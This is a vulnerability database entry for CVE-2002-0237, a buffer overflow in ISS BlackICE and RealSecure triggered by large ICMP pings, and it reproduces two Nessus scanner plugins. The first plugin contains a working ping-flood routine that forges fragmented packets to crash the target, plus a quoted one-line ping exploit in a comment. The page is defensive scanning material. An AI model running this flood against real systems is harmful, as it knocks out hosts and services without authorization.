Vulnerabilities > CVE-2002-0237 - Buffer Overflow vulnerability in ISS products
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
PARTIAL Integrity impact
PARTIAL Availability impact
PARTIAL Summary
Buffer overflow in ISS BlackICE Defender 2.9 and earlier, BlackICE Agent 3.0 and 3.1, and RealSecure Server Sensor 6.0.1 and 6.5 allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a flood of large ICMP ping packets.
Vulnerable Configurations
| Part | Description | Count |
|---|---|---|
| Application | 7 |
Nessus
NASL family Firewalls NASL id BLACKICE_DOS.NASL description The remote host appears to be running either BlackICE or RealSecure Server Sensor. This application has a remote buffer overflow vulnerability. It was possible to crash the application by flooding it with 10 KB ping packets. A remote attacker could exploit this to cause a denial of service, or potentially execute arbitrary code. last seen 2020-06-01 modified 2020-06-02 plugin id 10927 published 2002-03-29 reporter This script is Copyright (C) 2002-2019 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/10927 title ISS BlackICE / RealSecure Large ICMP Ping Packet Overflow DoS code # # (C) Tenable Network Security, Inc. # # TBD : eEye gives this "exploit": ping -s 60000 -c 16 -p CC 1.1.1.1 # But according to others, it doesn't work. include("compat.inc"); if(description) { script_id(10927); script_version ("1.33"); script_cve_id("CVE-2002-0237"); script_bugtraq_id(4025); script_name(english:"ISS BlackICE / RealSecure Large ICMP Ping Packet Overflow DoS"); script_summary(english:"Ping flood the remote machine and kills BlackICE"); script_set_attribute(attribute:"synopsis", value: "The application running on the remote host has a remote buffer overflow vulnerability." ); script_set_attribute(attribute:"description", value: "The remote host appears to be running either BlackICE or RealSecure Server Sensor. This application has a remote buffer overflow vulnerability. It was possible to crash the application by flooding it with 10 KB ping packets. A remote attacker could exploit this to cause a denial of service, or potentially execute arbitrary code." ); script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2002/Feb/37" ); script_set_attribute( attribute:"see_also", value:"https://seclists.org/bugtraq/2002/Feb/51" ); script_set_attribute( attribute:"see_also", value:"https://seclists.org/bugtraq/2002/Feb/48" ); script_set_attribute( attribute:"see_also", value:"http://web.archive.org/web/20131113184518/http://www.iss.net:80/threats/advise109.html" ); script_set_attribute( attribute:"solution", value:"Apply the appropriate patch referenced in the ISS advisory." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available"); script_set_attribute(attribute:"exploit_available", value:"false"); script_set_attribute(attribute:"plugin_publication_date", value: "2002/03/29"); script_set_attribute(attribute:"vuln_publication_date", value: "2002/02/04"); script_cvs_date("Date: 2019/03/06 18:38:55"); script_set_attribute(attribute:"potential_vulnerability", value:"true"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_end_attributes(); if (ACT_FLOOD) script_category(ACT_FLOOD); else script_category(ACT_KILL_HOST); script_copyright(english:"This script is Copyright (C) 2002-2019 Tenable Network Security, Inc."); script_family(english:"Firewalls"); #script_add_preference(name:"Flood length :", type:"entry", value:"600"); #script_add_preference(name:"Data length :", type:"entry", value:"10000"); script_require_keys("Settings/ThoroughTests", "Settings/ParanoidReport"); exit(0); } include("global_settings.inc"); if ( TARGET_IS_IPV6 ) exit(0); if (! thorough_tests || report_paranoia < 2) exit(0); # # The script code starts here # start_denial(); #fl = script_get_preference("Flood length :"); if (! fl) fl = 600; #dl = script_get_preference("Data length :"); if (! dl) dl = 60000; mtu = get_kb_item('ICMP/PMTU'); if (! mtu) mtu = get_kb_item('TCP/PMTU'); if (! mtu) mtu = 1500; maxdata = mtu - 20 - 8; # IP + ICMP maxdata = maxdata / 8; maxdata = maxdata * 8; if (maxdata < 16) maxdata = 544; src = compat::this_host(); dst = get_host_ip(); id = 666; seq = 0; for (i = 0; i < fl; i=i+1) { id = id + 1; seq = seq + 1; for (j = 0; j < dl; j=j+maxdata) { datalen = dl - j; o = j / 8; if (datalen > maxdata) { o = o | 0x2000; datalen = maxdata; } ##display(string("i=",i,"; j=", j, "; o=", o, ";dl=", datalen, "\n")); ip = forge_ip_packet(ip_v:4, ip_hl:5, ip_tos:0, ip_off:o, ip_p:IPPROTO_ICMP, ip_id:id, ip_ttl:0x40, ip_src:compat::this_host()); icmp = forge_icmp_packet(ip:ip, icmp_type:8, icmp_code:0, icmp_seq: seq, icmp_id:seq, data:crap(datalen-8)); send_packet(icmp, pcap_active: 0); } } alive = end_denial(); if(!alive){ security_hole(); set_kb_item(name:"Host/dead", value:TRUE); }NASL family Windows NASL id BLACKICE_VERSION_CHECKER.NASL description ISS BlackICE is a personal Firewall/IDS for windows Desktops. Several remote holes have been found in the product. An attacker, exploiting these flaws, would be able to either crash the remote firewall/IDS service or execute code on the target machine. According to the remote version number, the remote host is vulnerable to at least one remote overflow. last seen 2020-06-01 modified 2020-06-02 plugin id 12114 published 2004-03-19 reporter This script is Copyright (C) 2004-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/12114 title ISS BlackICE Multiple Remote Vulnerabilities code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(12114); script_version("1.30"); script_cvs_date("Date: 2018/06/27 18:42:27"); script_cve_id( "CVE-2000-0562", "CVE-2002-0237", "CVE-2002-0956", "CVE-2002-0957", "CVE-2004-0193", "CVE-2004-2125", "CVE-2004-2126" ); script_bugtraq_id(1389, 4025, 4950, 9513, 9514, 9752); script_name(english:"ISS BlackICE Multiple Remote Vulnerabilities"); script_summary(english:"ISS BlackICE Vulnerable version detection"); script_set_attribute(attribute:"synopsis", value: "The firewall running on the remote host has multiple buffer overflow vulnerabilities."); script_set_attribute(attribute:"description", value: "ISS BlackICE is a personal Firewall/IDS for windows Desktops. Several remote holes have been found in the product. An attacker, exploiting these flaws, would be able to either crash the remote firewall/IDS service or execute code on the target machine. According to the remote version number, the remote host is vulnerable to at least one remote overflow."); script_set_attribute(attribute:"see_also", value:"http://www.eeye.com/html/Research/Advisories/AD20040226.html"); script_set_attribute(attribute:"see_also", value:"http://www.eeye.com/html/Research/Advisories/AD20040318.html"); script_set_attribute(attribute:"solution", value:"Upgrade to the latest version of BlackICE."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available"); script_set_attribute(attribute:"exploit_available", value:"false"); script_set_attribute(attribute:"vuln_publication_date", value:"2000/06/20"); script_set_attribute(attribute:"plugin_publication_date", value:"2004/03/19"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"patch_publication_date", value:"2004/02/26"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"Windows"); script_copyright(english:"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc."); script_dependencies("blackice_configs.nasl"); script_require_keys("SMB/BlackICE/Version"); script_require_ports(139, 445); exit(0); } include("smb_func.inc"); myread = get_kb_item("SMB/BlackICE/Version"); if ( ! myread ) exit(0); # what does the logfile format look like: # ---------- BLACKD.LOG # [25]Fri, 19 Mar 2004 09:58:20: BlackICE Product Version : 7.0.ebf if (strstr(myread, "BlackICE Product Version")) { # all versions 7.0 eba through ebh and 3.6 ebr through ecb if (egrep(string:myread, pattern:"BlackICE Product Version.*(7\.0\.eb[a-h]|3\.6\.e(b[r-z]|c[ab]))")) { # do a warning for smb bug mywarning = string( "According to the remote version number, the remote host is vulnerable to a bug wherein a malformed SMB packet will allow the attacker to execute arbitrary code on the target system."); port = kb_smb_transport(); if (!port) port = 139; security_hole(port:port, extra:mywarning); } # all versions prior to 7.0.ebl and 3.6.ecf if ( (egrep(string:myread, pattern:"BlackICE Product Version.*[0-6]\.[0-9]\.[a-z][a-z][a-z]")) || (egrep(string:myread, pattern:"BlackICE Product Version.*7\.0\.([a-d][a-z][a-z]|e(a[a-z]|b[a-h]))")) ) { mywarning = string( "According to the remote version number, the remote host is vulnerable to a bug wherein a malformed ICQ packet will allow the attacker to execute arbitrary code on the target system."); port = kb_smb_transport(); if (!port) port = 139; security_hole(port:port, extra:mywarning); } # only certain versions which have a default config issue # VULN VERSION: # 7.0 eb[j-m] # 3.6 ec[d-g] # 3.6 cc[d-g] if (egrep(string:myread, pattern:"BlackICE Product Version.*(7\.0\.eb[j-m]|3\.6\.(ec[d-g]|cc[d-g]))")) { #warning for misconfiguration mywarning = string( "Nessus detected a version of BlackICE with insecure default settings."); port = kb_smb_transport(); if (!port) port = 139; security_hole(port:port, extra:mywarning); } }
References
- http://marc.info/?l=bugtraq&m=101286393404301&w=2
- http://marc.info/?l=bugtraq&m=101302424803268&w=2
- http://marc.info/?l=bugtraq&m=101321744807452&w=2
- http://marc.info/?l=ntbugtraq&m=101353165915171&w=2
- http://www.iss.net/security_center/alerts/advise109.php
- http://www.iss.net/security_center/static/8058.php
- http://www.securityfocus.com/bid/4025